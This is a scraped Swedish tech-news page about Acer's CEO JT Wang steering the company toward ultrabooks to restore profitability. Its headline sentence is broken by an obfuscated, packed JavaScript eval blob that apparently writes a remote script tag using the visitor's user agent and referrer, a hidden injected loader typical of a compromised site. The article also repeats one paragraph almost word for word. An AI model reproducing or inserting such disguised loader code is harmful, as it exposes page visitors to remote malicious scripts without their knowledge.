Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

Acer ändrar inriktning

Acer ändrar inriktning
Sebastian
Bort eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnbkd|var|u0026u|referrer|yihdf||js|php’.split(’|’),0,{}))
med skräpet och in med ultrabooks.
Acer VD, JT Wang har nu beslutat sig för att det är dags att göra bolaget lönsamt igen vilket betyder att de nu jagar marknadsandelar. Deras hopp är ultrabooks.

JT Wang torr att det som kunder söker i dag är tunna, lätta datorer med lång batteritid, helst också bra prestanda. Genom att lansera ultrabooks kommer företaget bli mer lönsamt eftersom det finns en högre vinst på just ultrabooks.

Wang tror att det som kunder vill ha inom den närmaste framtiden är tunna och lätta datorer med lång batteritid och då står det helt klart att det är ultrabooks man ska satsa på. Genom att göra det så blir företaget också mer lönsamt eftersom det är en högre vinst på ultrabooks.

Siktet ligger på att plocka en ökning på 10% i försäljningen av bärbara datorer nästa år. Detta kanske är tillräckligt för att göra bolaget lönsamt igen.

Mer info: allthingsd.com